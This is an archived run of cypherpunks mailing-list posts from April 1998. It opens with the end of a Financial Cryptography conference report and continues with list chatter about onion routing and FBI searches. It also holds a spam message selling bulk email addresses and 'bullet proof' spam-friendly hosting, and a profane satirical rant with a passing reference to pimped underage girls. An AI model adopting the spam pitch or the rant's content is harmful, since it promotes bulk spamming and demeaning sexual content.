to turn an export version of Netscape into one with all the strong
crypto and announce a contest to write a smaller one. He also extended
the contest to write a similar program for Internet Explorer.

The next talk was ``Curbing Junk E-Mail via Secure Classification'' by
Eran Gabber, Markus Jakobsson, Yossi Matias, and Alain Mayer (the last
of whom gave the talk).  H e noted that spamming is currently easy:
it's easy to to gets lots of addresses and to send to them, and it's
hard to distinguish spam from other mail. There are tools available,
but their solution was claimed to have advantages over each of them.
The gist of their solution is to have extended email addresses,
basically you have a core address plus extensions for use with
multiple groups of users. A handshake to the core address just gets
extensions This deters spammers and adds functionality.  Also, you can
later revoke an extension (by filtering all messages with that
extension). So a spammer buying the address from another spammer won't
get any value since the extension is revoked.  This approach is claimed
to be provide transparency of extensions to actual users, robustness
(flexible about how much automation is used) backwards compatibility
with sendmail, etc., and -interoperability with the rest of the world.

Next up was ``Publicly Verifiable Lotteries:  Applications of Delaying
Functions'' by David Goldschlag and Stuart Stubblebine.  Regular
lotteries require trusting the auditors and determining the winner is
not repeatable since it relies on a random element. The goal here is to
find a fair, closed, and publicly verifiable lottery in which not
even the lottery agent is trusted.  The basic idea is to make the
winning number calculation slow and require at least one random entry.
Besides the obvious application of running a lottery other applications
include distributed random numbers (with a low overhead of communication).
It was also shown how to use delaying functions in the exchange protocol
I described in the rump session.

The next paper was ``Security of Digital Watermarks'' by Lesley R.
Matheson, Stephen G. Mitchell, Talal G. Shamoon, Robert E. Tarjan, and
Francis X. Zane.  This was a very nice survey of existing watermarking
technologies.  Their stated goal is to have invisible and robust
watermarking: only the key holder can find it, and it can't be removed
without destroying the data.  The focus was on perceptual content
(video, etc.) rather than representational content (programming text,
etc.) It was noted that it may be Important to have layers of marking
for e.g. private and public watermarks.

After lunch came ``Security in the Java Electronic Commerce Framework''
by Surya Koneru, Ted Goldstein. The talk was given by John Ziegler.
The talk contrasted commerce with EDI. Commerce is not about absolute
trust.  In fact, spontaneous commerce requires zero trust in the
principals; all trust is in the payment token. The opposite extreme is
EDI, where trust is in the long term relationship, and the payment
token can be just about anything.  Their offerings are Java Commerce
Beans and Java Commerce Client (a wallet).  Java Commerce Client
anchors the client side of the transaction, handles client delivery,
installation, update, cooperation with a trusted and familiar
interface.  Java Commerce Beans provide a structure for creating
customer relationships:  operations, instruments, protocols, services,
etc.

Next up was ``Beyond Identity: Warranty-Based Digital Signature
Transactions'' by Yair Frankel, David Kravitz, Charles Montgomery, and
Moti Yung.  A standard CA architecture assures static properties,
liability with respect to contract enforcement, nonrepudiation of
signers, etc.  The main concept of a warranty is that it addresses the
need to further validate current contextual information beyond
identity. A warranty granting transaction system is dynamic: providing
warrants on a per-transaction basis, accounting for user history and
providing user-specified access to control parameters.

The next presentation was ``Compliance Checking in the PolicyMaker
Trust Management System'' by Matt Blaze, Joan Feigenbaum, and Martin
Strauss.  The motivating problem for this presentation was: Even if
wary customer Alice has convinced herself that Bob of small company
Bobsoft signed a program so what?  She wants to know if Bob complies
with her policy for buying software. The topic of this paper is: What
do we mean by proof of compliance?  Compliance checking approach works
by incremental proofs using supplied credentials (authorizations). For
example, Cred1 is run and it says Bankofficer1 will approve if he sees
evidence of freshness. Cred2 is run and says fresh, Cred1 is run again
and says approved.  Yes means there is some finite sequence of the
running of credentials there is an acceptance record that says the
policy is satisfied.  But this is undecidable!  (Various restrictions
can get this down to NP hard, or NP complete.) Nonetheless, this has
been implemented and runs in application.  Applications noted as
described elsewhere include signed email, PICS labels, and license
management.  Note that since policies must be monotonic you can't
directly do certificate revocation type things.

Next was ``An Efficient Fair Off-Line Electronic Cash System with
Extensions to Checks and Wallets with Observers'' by Aymeric de Solages
and Jacque Traore.  This paper is at the most recent in a chain of
papers making various improvements on Brands's CRYPTO 93 paper of
similar name.  The present contribution is to improve the efficiency of
the payment protocol.

The final paper of the official program was ``An Efficient Untraceable
Electronic Money System Based on Partially Blind Signatures of the
Discrete Logarithm Problem'' by Shingo Miyazaki and Kouichi Sakurai.
Those who stayed until this last paper were rewarded with an
interesting talk that began with a presentation of nondigital (hence
exportable) origami ninja weapons.  The basic idea is that the signer
signs a blind part (user ID and coin number) and a clear part (validity
and amount of money).  Partially blind signature makes the system more
efficient because bill amounts need not be tied to signing key, i.e.,
you don't need a separate key for $10 bills, $20 bills, etc.  The
combined embedding and engraving signature scheme is designed to cover
all the types of information needed.

Thursday was primarily occupied by an empirical investigation of
so-called  ``ecliptic curve cryptography''. That is, most of us took a
boat down to a few miles off the coast of Montserrat to observe a total
eclipse of the sun while simultaneously keeping one eye on the volcano
spewing tons of ash just to our west. The geek-o-meter registered quite
high as several preprogrammed GPS devices could be heard going off when
the boat reached the contracted observation location. (Other evidence
of geekhood such as people spotted brandishing a laptop and a notebook
on the boat and actually doing work are vehemently denied by this author.)

Friday after breakfast there was an unscheduled question and answer
hour with David Chaum, which I was unfortunately unable to attend.
After this there was a roundtable discussion on ``Financial
Intermediaries, Public Networks, and Financial Cryptography'' moderated
by Steve Schear. Other presenters were Paul Guthrie, A.S. von Bernhardi
(aka Black Unicorn), and Frank Trotter.

Steve Schear lead off with an overview.  On a national level, the
central bank is the ultimate financial intermediary---setting interest
rates, rules for interbank loans, etc.  Below them are the commercial
banks.  These do the financial networks and management for individuals
and businesses.  Below them are the credit cards between the banks and
the consumers.  These do risk management.  There are also a large
number of processors like First Data, and Virtual that sit between the
bank and the merchant, as well as ATM networks like Cirrus and smaller
regional associations like Most.  Finally, there are also nonbank
financial intermediaries brokers, check cashing services, etc.

Paul Guthrie gave a description of where things are going with card
associations, which are made of member banks (Visa, Mastercard), and
card companies, which have as customers rather the end consumer
(American Express, Discover).  For card associations, acceptance will
imply certificates (making sure that the card is accepted at a store
need merchant certificates since anyone can stick up a logo on a Web
page).  Cards will carry more software. There will need to be PKI
infrastructures.  There may be adoption of new payment systems. There
will also be more opportunity for new brands in cyberspace. Thus, the
meaning of brands must be made clearer. Adam Shostack asked: networks
can be more open and yet there is going to be more certification of who
is authorized to accept a card?  Answer: It's up to the member bank,
which merchants they want to back. More liberal banks will run a higher
discount rate.

Frank Trotter began by observing that there are no hard currencies anymore
and discussed the roles of some of the traditional players in the new world.
He observed that state banks and regulatory agencies have increasingly
less reason for being, resulting in various turf squabbles.
Banks meanwhile are trying to defend their current franchise value.
Banks provide credit stability for the consumer.
If anybody who sets up a private mint and goes bankrupt, that will kill the
the confidence in the market for some time.

At that point von Bernhardi brought up the story of the failure of the
EU Bank in Antigua. This was basically an offshore, online bank that
was destroyed and lost (only!) 12 million dollars.  Someone noted that
it's good this happened earlier when the sacrifice was small and
everyone can make sure it doesn't happen again.  The important danger
is that institutional risk becomes systemic risk.  Guthrie noted that
Visa will drop banks that become a risk or will require a cash deposit
in a third party neutral bank.  Then, von Bernhardi contrasted public vs.
private insurance (what he called ``the myth of government backing of
financial institutions'').  Trotter then pointed out that many other
industries are are moving into banking.  Telecom is the biggest threat
to banking:  they have a big base and good records.  They could start to
take deposits and get backing of FDIC.

In beginning his own presentation, von Bernhardi stated that, ``It's
ironic I'm here...  At the far end of the tunnel, I would like to see
intermediaries diminish.'' He proceeded to give his impression as an
offshore banker.  The motivation is not to provide stability of the
international financial community but to make money.  Local offshore
governments typically take an attitude of `if you behave here, you can
stay'. The threshold of acceptable behavior is much higher than in the
US.  Regulators in the US are interested in providing global
stability.  Offshore banks MUST operate out of band, because they're
there.  To connect to the system, they have to go through the ACH
(Automated Clearing House). They have to go through VISA. But, there's
a lot more freedom.  He would like to see financial intermediaries
functioning in the exception rather than ordinarily in transactions.
Consumer efficiency involves reducing the middle man.  But, then how do
we broker trust?  Well you can have TTPs in the short run.  Crypto
protocols won't do the whole job.  Offshore could use these new
technologies so that they can go through these intermediaries faster.
But, in the long run, fewer and more offline intermediaries is the way
to go.  Reputation, he noted, is a multifaceted issue. It's not just a
question of having a certificate on the wall. ``If one of my clients
walked in to Citibank with a cashier's check from us, I can guarantee
that it won't clear right away.''

Someone asked from the floor what will happen when we start to see
private minting. etc. Bernhardi responded that selling your frequent
flyer miles is now possible and becoming easier.  And, Trotter observed
that you build a trading system, and if enough trust is built into the
system it becomes another currency.  Someone else in the audience
observed that the very existence of these systems is evidence of
inefficiencies in the main systems. They will then adapt and primarily
the small systems will remain small.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Wed, 29 Apr 1998 09:04:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Why does the Navy research onion routing?
Message-ID: <3.0.5.32.19980429090405.0079b940@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



Why does the Navy research onion routing?

Only reason I can think of is so that .mil can 
study other sites anonymously, or communicate
amongst themselves using anonymous-routing-tech
to avoid traffic analysis.

The other practical possibility is that they're happy
to have smart CS people and will fund whatever they
want to do, just to keep them.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I actually thought Silicon Valley was where women went to get fixed."
		---LA Mayor Richard Riordan 98.02.19




	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Wed, 29 Apr 1998 09:12:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FBI scans public-access terminal used by Lewinsky
Message-ID: <3.0.5.32.19980429091218.007a03a0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


	

Anyone remember PROMIS?




http://www.drudgereport.com/1.htm#1

excerpt:

FBI agents working the Starr probe zeroed in on PARCEL PLUS in early
February, it has been learned. 

Agents conducted interviews and spent hours with the store's computer. 

"They were digging around in the computer's guts," a store source explains,
"below DOS." 

STARR's team interviewed the store's owner and two other employees -- with one
employee taking a trip down to Starr's office for questioning. 

Investigators have left nothing to chance: subpoenaing detailed information
from PARCEL PLUS' local Internet provider and digging up all of the store's
phone records via BELL ATLANTIC.
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I actually thought Silicon Valley was where women went to get fixed."
		---LA Mayor Richard Riordan 98.02.19




	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 29 Apr 1998 22:03:00 -0700 (PDT)
To: Toto <toto@sk.sympatico.ca>
Subject: Re: Army, Navy and Alt2600 Farce
In-Reply-To: <3547A2FC.6267@sk.sympatico.ca>
Message-ID: <Pine.BSF.3.91.980429104545.2155A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 29 Apr 1998, Toto wrote:

> 
> COMING IN ON A WING AND DISPAIR  (29 April 1998)
> 
>         Pilots are leaving the Air Force like fleas jumping off a dead 
> dog. If
> this exodus in blue doesn't stop, there won't be anyone left to fly the
> existing megabuck fleet of aircraft or the trillion dollar fleet of
> space-age new fighters the Air Force wants for the 21st century.

If you think it will be hard to find people who are willing to join the 
military just to have a shot at flyin' mach 2 with their hair on fire, 
you're gettin' too damn old.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 29 Apr 1998 10:52:11 -0700 (PDT)
To: David Honig <honig@alum.mit.edu>
Subject: Re: FBI scans public-access terminal used by Lewinsky
In-Reply-To: <3.0.5.32.19980429091218.007a03a0@otc.net>
Message-ID: <199804291705.NAA01219@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980429091218.007a03a0@otc.net>, on 04/29/98 
   at 09:12 AM, David Honig <honig@alum.mit.edu> said:

>"They were digging around in the computer's guts," a store source
>explains, "below DOS." 

I *really* wish these so-called journalist would not quote absolute
morons. What the @$@% does "below DOS" mean?!? They run a copy of PC Tools
and do a sector scan of the HD? Gee isn't that just scary!!

The clueless are a dime a dozen, I would like to find the SOB passing out
the dimes!!

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Windows done RIGHT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNUdevY9Co1n+aLhhAQGo8AP+IzymVxmjezS7ZTrQkP7olIlwUu62VmOG
ONX7lLhwYWK1zoKxcwuKh78AECmUCA49tLuHM2m3i0nhr0zKWiMxXt3odLpXqciJ
qAVvR3KB+pFRnTpikAW8LEctqR8+0gdl9VQq777oiorg+rtLXo2u5AeLk2bIctTK
YER5OvtjuRk=
=QZBR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 29 Apr 1998 15:03:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Army, Navy and Alt2600 Farce
Message-ID: <3547A2FC.6267@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


## Anon-To: Pretty Lousy Privacy <plp@dev.null>
:: Subject: POP Secret Communication / Boil in oil after Reading!!!

COMING IN ON A WING AND DISPAIR  (29 April 1998)

        Pilots are leaving the Air Force like fleas jumping off a dead 
dog. If
this exodus in blue doesn't stop, there won't be anyone left to fly the
existing megabuck fleet of aircraft or the trillion dollar fleet of
space-age new fighters the Air Force wants for the 21st century.

        Without pilots it's going to be even harder to justify all these 
costly
new silver bullets when a congressperson or two without bases or flying
machine plants back home comes asking, "Who needs these suckers when
missiles, robots, bugs and germs, and 16-year-old hackers will be the
weapons of the future?"
http://www.hackworth.com
~~~~~~~~~~~~~~~~~~~~~~~~

"That wasn't hacking, cracking and phreaking...that was 'unauthorized
military training'!"
~ Lou Tenant, Graham (Cracker) Johnny (DuneWadd) Buller (Shit) 
  AttackAdamMe of Computron Seances and Waste Drugsposal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 29 Apr 1998 15:03:03 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: FBI scans public-access terminal used by Lewinsky
In-Reply-To: <199804291705.NAA01219@users.invweb.net>
Message-ID: <3547A42E.5871@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> -----BEGIN PGP VIRUSED MESSAGE-----
> In <3.0.5.32.19980429091218.007a03a0@otc.net>, on 04/29/98
>    at 09:12 AM, David Honig <honig@alum.mit.edu> said:
> >"They were digging around in the computer's guts," a store source
> >explains, "below DOS."

> I *really* wish these so-called journalist would not quote absolute
> morons. What the @$@% does "below DOS" mean?!? They run a copy of PC Tools
> and do a sector scan of the HD? Gee isn't that just scary!!
> 
> The clueless are a dime a dozen, I would like to find the SOB passing out
> the dimes!!

Me too...I need the money.

Anonymos (Otot-ay!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 29 Apr 1998 17:59:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The Epilogue That Never Was - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <3547CDC6.1990@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


The Epilogue That Never Was - SPACE ALIENS HIDE MY DRUGS!!!
________________________________________________________

Memoirs of a Visible Man:

  When you are 'different' from others--inherently, irrevocably, 
unarguably different--you either learn to remain, as much as possible, 
invisible, or you spend much of your life in various sorts of prisons, 
subject to various kinds of punishments.
  There have always been a few 'safe havens' for those guilty of the 
crime of being different from those around them, although, for the most 
part, they have historically tended to be 'dangerous' safe havens such 
as pirate or merchant ships, new world colonies, fringe religious or 
political movements. Those with wits, who didn't mind joining the ranks 
of the lower fringes of society, in return for ostensibly remaining 
within it, could become court jesters, actors, artists, and the like.

  With the advent of the Age of Electonics and the rise of Virtual 
Reality, those who are able to remain within society's outer boundaries 
by comically or entertainingly mirroring the parts of the human psyche 
and human emotions that society requires its 'regular' members to 
repress have become elite, well-paid artisians who are recognized as 
valuable professionals in the Age of Form Over Substance.
  For those in the lower strata of society who are unable to 
successfully graduate from Society's Finishing School--usually as a 
result of answering  "Fuck You, Shit For Brains" to questions where a 
"Yes Sir/Officer/YourHonor" answer is required--there are no longer many 
physical locations available where one can escape to , which results in 
the creation of an increasing number of them being labeled 'criminals' 
and banished to New World Order colonies consisting of six-foot cabins 
bounded by iron bars.
  Those in the higher strata of society who are unable or unwilling to 
live within the boundaries society requires of the masses often have the 
option of joining an elite group of criminal-actors who have sufficient 
firepower at their command to bully the others in society into 
recognizing their authority to disobey all of society's rules and act in 
their own self-interest while denying they are doing so by telling 
blatant and outrageous lies. (Those with a particular talent in this 
area sometimes reach the epitome of politics, in which the masses 
consider them to be every bit as 'real' as the 'people' on 'As The World 
Turns.' They are then free to do everything that Soap Opera actors do, 
with equal impunity from facing the real-life consequences that come 
from manslaughter, rape, robbery, marriage and drug-addiction--although 
they are still subject to the laws of physics when playing 
ski-football.)

  In the Glory Days of Virtual Reality, before the ElectroMagnetic 
Curtain began descending around those lured away from InterNet Free 
Terra and into the Sticky World Wide Web of the InfoMercial Highway 
Robbers, there were a few true Rennaisance Criminal Genius Elite who 
recognized that they could settle down from a life on the run--in small 
prairie towns such as Bienfait, Saskatchewan--and still live wild and 
free, riding the Virtual Outlaw Trail through the Alt2600 BadLands, 
robbing DataBanks, engaging in drunken brawls in the CypherPunks 
CryptoSaloon, partying with Bound and Gagged Asian DanceHall UnderAge 
Girls being pimped by Adult Check, and having the rugged good looks of 
Robert Redford, in an ASCII Art kind of way.
  Once the Information Railway began being replaced by the Information 
Highway as a comfortable, convenient way for the masses to journey into 
what were formerly remote Electronic Wilderness Areas, the outlaws and 
free-stinkers who had formerly been able to remain, for  the most part, 
invisible to the programmed masses, yearning to keep other minds from 
being free, found themselves subject to the scrutiny of those who 
recognized that free-range cattle and penned sheep could not peacefully 
coexist in a merchant society where corporate mergers to create Company 
Towns, with Company Stores, would be jeopardized by small-time rustlers 
and fence-cutters.
  Thus there arose a need for ElectroMagnetic Law and Order, supported 
by the muddled assholes, struggling to be Freeh.


The Lost Train of Thought (Part I):
  ...uuuhhhhh...


The Runaway Train of Thought Is Melted Down To Build The WhatIf Server:

WhatIf: A ClueLess Canuck, turned into a MindBot by the Institute of  
Applied Metaphysics in preparation for the Moscow Olympics, was culled 
from a Russian language class full of Canadian Mounties at the 
University of Regina by a Dark Continent TigerTeam agent and trained in 
Psychic Warfare?

WhatIf: A DoubleShinned Agent trained at the Psycho War Fair travelled 
to Africa with a Nuclear Physicist who was the youngest President at 
Oberlin College, and met with his TigerTeam controllers in a bar full of 
sailors from the U.S.S. Enterprise in the heart of Mombassa, as other 
members of his travelling group were engaged in a 'tour' of a US Navy 
ship?

WhatIf: A ClassLess Canuck highly trained in the Lack of Social Skills 
travelled to East Germany and Poland shortly after the Fall of the Wall, 
y'all, crossing the Polish border illegally to meet with members of the 
Little Nicky Telsa Fan Club at the same time that the ShakeSpearAtIan 
NukeKingLear PharmAssist (who got glowing reviews for the Polish 
translation of his work) was in Moscow, paying pipers and pimps to play 
the tunes called by his Muppet Pastors for the NuclearPowered Dancing 
Bears?

Qu'est Que C'est: A Psychic Killer To  Be Named Later was apprehended 
fleeing Poland, but walked away a free MindBot before the InTerraGators 
arrived, after paying a seventy Mark Antony Fine to a 'confused' Polish 
border guard, and was then intercepted upon his arrival back in the 
United States by US Customs agents instructed to hold him for 
interrogation regarding his US passport with a Polish exit stamp, but no 
Polish visa or  entrance stamp, and then slipped away after the 
'confused' agents merely confiscated his Black Forest Ham and released 
him, whereupon he quickly slipped off to a different airport to take a 
small plane to Nantucket to meet a female agent of  the Holy Roman 
Empire instructed to arrange for his transfer to a private yacht bound 
for a private compound of Nazi BusinessWar Criminals on a nearby island 
famous for their Celebrity Midnight Marathon Swim and Drunken Driving 
and Diving Festival?

WhatIf: A Dangerously Drunken Psychotic PissAnt Drug-Addicted Dumb-Ass 
Shit-Disturber To Be Maimed Later concocted some wild, unbelievable 
story to fuck with the mimes of the MimeFuckers, but all the details of 
his mad ramblings were already a verifiably true part of the SecretGuys' 
SecretGuyFiles, and even a cursory investigation would reveal even more 
conspiratorial concepts concerning his connection to a Forth Freudian 
Sufi Sect dedicated to Anti-NukeUnclear Publishing of Libertarian 
Mathematical GreenPeace OverGround GoreVillain Manuals designed to apply 
Laws of Form to a ChaosKult attack on the Fourth JavaCup Active-X-Files 
Implementation of A Disturbed CraptoLogical LISP MamboErs' Secret Agenda 
to Subvert Authority by making the Ship of Goverment list so far to the 
left that the Titanic balls of the Hermerphodite Aunt E. Christ are cut 
off as she slides over the rail, into the sea, emerging from the depths 
as Anne R. Christ who is Lucky enough to surface in time to hitch a ride 
on the Millenium Bug just before the Reptilian Nazi GermanAmericans 
circle the VolksWagons in a Two-Byte Double Donut formation to prepare 
for the attack of Naieve Americans with Wounded Knees whose Peyote 
Dreams predict that an Elvis whose Aim Is True will use Broken Arrows to 
cut off the Forked Tongues of the Serpentine Servants of Satan living in 
secret underground bunkers beneath both the AdamAntArctic and Mule Shoe, 
Texas, in the Land of the Freeh?

WhatIf: Incompetent Secret Agents To Be Framed Later gave up on 
purporting to properly protect National Security <flags digitally wave> 
<Matt's trumpets Blaze FORTH> in order to fail in their efforts to find 
a single innocent child to save from drugs dealers at the PROM, and, in 
their frustration at not being able to find the <ANY> Key which will 
connect them to the ClueServer, hit the <DELETE> key instead, erasing 
the cleverly crafted composition of the Author, admitting an astounding 
array of in-depth illegal involvement in countless consciously 
conspiratorial causes aimed at the overthrow of OverLords oppressing 
opponents of Fucking FreehDumb Privacy Pirates purloining the Leftist 
Constitutional Rights of silly,  sufficiently subdued SheepIzens 
subverting their own Freedom, Liberty and Privacy, as well as their 
right to Free Rum, the USS Liberty and Piracy?

WhatIf: You slapped yourself on the forehead, mystified as to how the 
Author managed to once again sucker you into reading the mindless trash 
that is placed inside his skull by psychic garbage-pickers who step on 
his foot, lifting his toupee, and toss in the leftover thoughts that 
were pruned from the minds of the vegetables planted in the Home For The 
Criminally Insane too early in the year to avoid being cold-cocked by 
the FrostBack of Notre Dame, initiated in Wilcox, Saskatchewan, into a 
Circle of  Eunuchs Chapter of Eternity Cult known as the Hockey Hounds 
of Hell On Ice?

WhatIf: Jesus Saves, but Gretsky puts in the rebounds?

(c) 1999.9, ADualist Huxter (Part IV of 'The Whores Of Deception')





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: profits_juno.com
Date: Wed, 29 Apr 1998 19:13:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199804300213.TAA27300@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi 

 

Dear Friend.

 

     I know you are looking for ways to either start your own home based 
business or looking for new ideas or products to enhance your current
business. Well, we have good news for *everyone*. 

     We have been closed for a while now so that we could  implement a
whole new design for our business.  We wanted to create a business that
had everything you need to start a new  business or find new ideas, products
and services for your existing business. We wanted  everything to be one 
website so that you would not have too look elsewhere for your needs.

     We are very proud to announce that we have completed our project. 
Our website is now open again. We are your *total* business resource.
We have your complete business needs all in one website. We have *millions*
of e-mail addresses, over 1000 business reports in various areas, classifieds,
software library, Bulk Friendly and Non-Bulk hosting and e-mail service
and MUCH MORE!!! 

Our membership is a one time LOW payment plus you can earn a referral
fee for *everyone* you sponsor!! 

 The biggest  problem with starting a new business on the Internet is,
most people don't where to go to find the information or products they 
need. And for those already in business, they may know where or how 
to find something, but  they just don't have the time to surf the Web  for hours. 

Come and visit our website for *all* your Internet Business needs!!
http://www.mail-info.com/HBN/index.htm

Thanks

We now offer "Bullet Proof" webhosting 
AND E-Mail Addresses  at an affordable 
rate. No more hassles from your ISP or web
hosting service!! You will NOT find a better deal on
bulk friendly hosting ANYWHERE!!!  So, become a 
member TODAY and get  your business moving!!!











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bruce@3d-cellular.com
Date: Wed, 29 Apr 1998 20:19:20 -0700 (PDT)
Subject: $$Money Saving Ideas, Forward to HR, Operations/Engineering Departments$$
Message-ID: <199804300319.UAA27665@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


3D Cellular provides money-saving solutions with wireless 
Data-Base Maintenance Services (Lucent).

Click on http://www.3d-cellular.com/DBMaint.htm

We handle all Lucent Data-Base Maintenance's:

Crisis        24hr Resolution guaranteed
Short Term    Weekly / Monthly / Quarterly Maintenance
Long Term     Maintenance on-going 
Database      Optimization / Audit

Satisfaction Guaranteed
Bruce Shaffstall
mailto:bruce@3d-cellular.com
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: verify@nytimes.com (New York Times subscription robot)
Date: Wed, 29 Apr 1998 21:45:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Welcome to The New York Times on the Web
Message-ID: <199804300445.AAA21060@content9a.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome, nyt_blows,

Thank you for subscribing to The New York Times on the Web.  

****************************
ABOUT YOUR REGISTRATION 
****************************

Your subscriber ID is   nyt_blows
You selected your password at registration.
Your e-mail address is  cypherpunks@toad.com

We encourage you to print this message and save it for 
future reference.  If you have any questions about your 
registration we can find your account using the subscriber ID
and e-mail address listed above.

Unless you chose otherwise, your subscriber ID and password
have been saved on your computer so that you do not have to
enter them each time you visit our site.  Please keep in mind
that you can enter this subscriber ID and password on any
computer to reach our Web site, so if you change computers or
install a new browser, there is no need to re-register.  If you
forget your password, please do not re-register.  You can retrieve
your password in the Help Center by clicking "Help" anywhere 
on the site.

For more information about the site and your registration, please
visit the Help Center at:

http://www.nytimes.com/subscribe/help/

*****************************************
ABOUT THE NEW YORK TIMES ON THE WEB
*****************************************

The New York Times on the Web combines the authority and
integrity of The New York Times with the immediacy, utility
and depth of the Internet.  Our site includes daily content 
from The Times, news updates every 10 minutes, original 
reporting and a host of interactive presentations and specials.

The site features up-to-the-minute sports scores and statistics;
current weather conditions and 5-day forecasts for over 1,500
cities worldwide; customizable stock portfolios, and a searchable
database of Real Estate and Help Wanted classified listings.  As a 
premium service, we offer a year's worth of the Crossword Puzzle,
five Bridge columns a week, and the Chess column.

The complete Sunday Book Review is available, including a free
searchable archive of more than 50,000 book reviews, an expanded
best-seller list, audio presentations of authors reading
from their own works, and first chapters of recently reviewed books.

Thank you for registering. We hope you will enjoy using 
The New York Times on the Web.

Visit us again soon at:  http://www.nytimes.com

*****************************************

Please DO NOT REPLY to this message.  If you did not 
authorize this registration, someone has mistakenly
registered using your e-mail address.  To have
this registration canceled please FORWARD this 
message to:

cancel@nytimes.com .





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Illuminatus Primus <vermont@gate.net>
Date: Thu, 30 Apr 1998 01:06:01 -0700 (PDT)
To: Frederick Burroughs <riburr@shentel.net>
Subject: Re: DNA = puppet masters?
In-Reply-To: <3547CD4F.7C07734A@shentel.net>
Message-ID: <Pine.LNX.3.96.980430035654.116c-100000@oto.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


I read an interesting short sci fi story that suggested that the
interactions of DNA represented the language of a higher organism; that
humans and other DNA-based life forms were merely the carriers.

On Wed, 29 Apr 1998, Frederick Burroughs wrote:

> 
> 
> Dan Veeneman wrote:
> 
> > For real paranoia fodder, check out the burgeoning biometrics field.
> 
> As the recent news regarding the Vietnam era Unknown Soldier at Arlington
> National Cemetery illustrates, biometrics will increasingly define who we
> are. Accomplishments and monuments will fall to bits. The bits of you extend
> before your birth and after your death, you are but a placeholder for a
> mitochondrial dna profile.
> 
> Will this resolution of organisms to digits open us to exploitation and limit
> our access to opportunities? What demon is forcing this template upon our
> very being?
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-news@netscape.com
Date: Thu, 30 Apr 1998 20:07:22 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Netcenter News - Volume 6 - April 1998
Message-ID: <199805010307.UAA08703@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  
 

Title: Netscape Netcenter News - April 1998






































Welcome to Netcenter
Netcenter is dedicated to the proposition that you should be able to find everything you need online in one place. This newsletter is one of the free benefits you receive when registering with a Netcenter program.
























Each month we'll link to a survey for Netcenter members. Check back the following month to see the results. This month's survey is Attention Small-Business Users. Netcenter will be launching a small-business site for you. Tell us what you'd like to see there.























Is the travel agent industry becoming extinct? Are the best bargains on the Net? The next Professional Connections Event Series features interviews with experts in the exploding field of online travel. Visit Professional Connections, and join the discussion.























Do you still experience the web in two dimensions? Download the free Netscape Communicator 4.05 with the Cosmo Player plug-in for a new 3D experience.














 



 

 
We've found a utility at Netscape Software Depot by software.net, for a special price, that lets you view hundreds of file types in Netscape Navigator! Inso's Quick View Plus has won awards from PC Computing and PC Magazine.  Download your copy today!











 





This issue of Netcenter News is brought to you by In-Box Direct.

























NETCENTER'S 
BUSINESS 
JOURNAL BY 
NEWSEDGE: 
INTELLIGENCE AT 
YOUR 
FINGERTIPS 



No time to visit all the business-related sites that help you get your job done? Let Netcenter's Business Journal by NewsEdge do the surfing for you.

Business Journal features the best, most relevant news and business information from the most trusted and authoritative publications in the world. Choose from over 2500 topics covering 20 different industries. Such a broad variety of topics and categories allows for incredible granularity in the information you receive.

When you register for Business Journal, you can automatically create a personalized My News page that delivers the news that matters most to you. Your news comes to you fast and is updated throughout the day, which means that you're more likely to get that one critical piece of data in time to solve a problem, beat a competitor, or make you a bundle.

